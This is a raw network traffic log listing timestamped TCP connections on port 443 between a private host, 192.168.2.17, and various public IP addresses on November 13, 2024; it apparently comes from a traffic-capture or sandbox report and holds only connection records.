                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917188883 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917223930 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917279005 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917284966 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917325974 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917854071 CET49880443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917953968 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.918210030 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.918232918 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.918304920 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.918304920 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.918313980 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.918524981 CET49880443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.918541908 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.919029951 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.919125080 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.919131041 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.919408083 CET44349879150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.919434071 CET44349879150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.919460058 CET44349879150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.919483900 CET49879443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.919488907 CET44349879150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.919534922 CET49879443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.920912981 CET44349879150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.920954943 CET44349879150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.921216965 CET49879443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.931560993 CET49870443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.951052904 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.951097965 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.951170921 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.951193094 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.951239109 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.951380014 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.951447010 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.951920033 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.955255985 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.955271959 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.961280107 CET49879443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.961297989 CET44349879150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.961555958 CET49880443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.962713957 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.963562012 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.963587999 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.963640928 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.963846922 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.963857889 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.964673996 CET49895443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.964683056 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.965430021 CET49895443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.965590000 CET49895443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.965600967 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993537903 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993551970 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993573904 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993596077 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993602991 CET49870443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993608952 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993633032 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993659019 CET49870443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993666887 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993681908 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993706942 CET49870443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.993730068 CET49870443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.004775047 CET49870443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.004786015 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.008753061 CET4434987213.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.008833885 CET4434987213.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.008876085 CET49872443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.010509968 CET44349882151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.010971069 CET49872443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.010987043 CET4434987213.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.013418913 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.013437033 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.013470888 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.013479948 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.013487101 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.013537884 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.013545990 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.014899969 CET49882443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.014910936 CET44349882151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.014925957 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.016371965 CET44349882151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.016424894 CET49882443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.016993046 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.017004013 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.017244101 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.017271996 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.017281055 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.017302036 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.017313957 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.017528057 CET49882443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.017605066 CET44349882151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.017673969 CET49882443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.017680883 CET44349882151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.025258064 CET44349883151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.025898933 CET49883443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.025907040 CET44349883151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.026961088 CET44349883151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.027013063 CET49883443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.028841019 CET49883443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.028898954 CET44349883151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.028970957 CET49883443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038402081 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038422108 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038439035 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038463116 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038551092 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038559914 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038575888 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038583994 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038597107 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038606882 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038659096 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038666010 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.038711071 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.039058924 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.039117098 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.039167881 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.057192087 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.057240963 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.057311058 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.057324886 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.057353973 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.057363987 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.071353912 CET44349883151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.072540045 CET49882443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.072683096 CET49883443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.072690010 CET44349883151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.075351000 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.082083941 CET49897443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.082118988 CET4434989754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.082190990 CET49897443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.082825899 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.082839966 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.084777117 CET49897443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.084789038 CET4434989754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.093602896 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.093662977 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.093674898 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.103153944 CET49899443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.103188038 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.103254080 CET49899443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.103492022 CET49900443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.103516102 CET4434990013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.103566885 CET49900443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.103890896 CET49899443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.103908062 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.104074955 CET49900443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.104091883 CET4434990013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.108119011 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.108130932 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.108195066 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.110131025 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.110146046 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.116456032 CET44349874142.250.185.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.119551897 CET49883443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.119607925 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.132641077 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.132688046 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.132710934 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.132723093 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.132741928 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.132750988 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.135546923 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.135560989 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.136962891 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.137006044 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.137043953 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.137052059 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.137084961 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.137103081 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.137109041 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.137204885 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.137413025 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.145176888 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.145193100 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.149559975 CET44349882151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.149854898 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.149867058 CET44349882151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.149899006 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.149945021 CET49882443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.149972916 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.150372982 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.150392056 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.161257029 CET44349883151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.161495924 CET44349883151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.161544085 CET49883443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.167567015 CET49874443192.168.2.17142.250.185.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.167591095 CET44349874142.250.185.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.178430080 CET49874443192.168.2.17142.250.185.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.178486109 CET44349874142.250.185.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.178533077 CET49874443192.168.2.17142.250.185.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.179780960 CET49882443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.179794073 CET44349882151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.183564901 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.186414003 CET49904443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.186439991 CET4434990413.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.189426899 CET49904443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.189632893 CET49904443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.189644098 CET4434990413.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.192024946 CET49883443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.192038059 CET44349883151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.192482948 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.192497015 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.192523956 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.192538023 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.192555904 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.192559004 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.192572117 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.192604065 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.192630053 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.203212976 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.203228951 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.203258991 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.203282118 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.203286886 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.203294039 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.203346014 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.212896109 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.212907076 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.212924004 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.212932110 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.212946892 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.212965965 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.212979078 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.213002920 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.255964041 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.255973101 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.255985975 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.256000996 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.256045103 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.256056070 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.256082058 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.275223017 CET44349884104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.277627945 CET49884443192.168.2.17104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.277638912 CET44349884104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.277971029 CET44349884104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.278620958 CET49884443192.168.2.17104.26.4.39
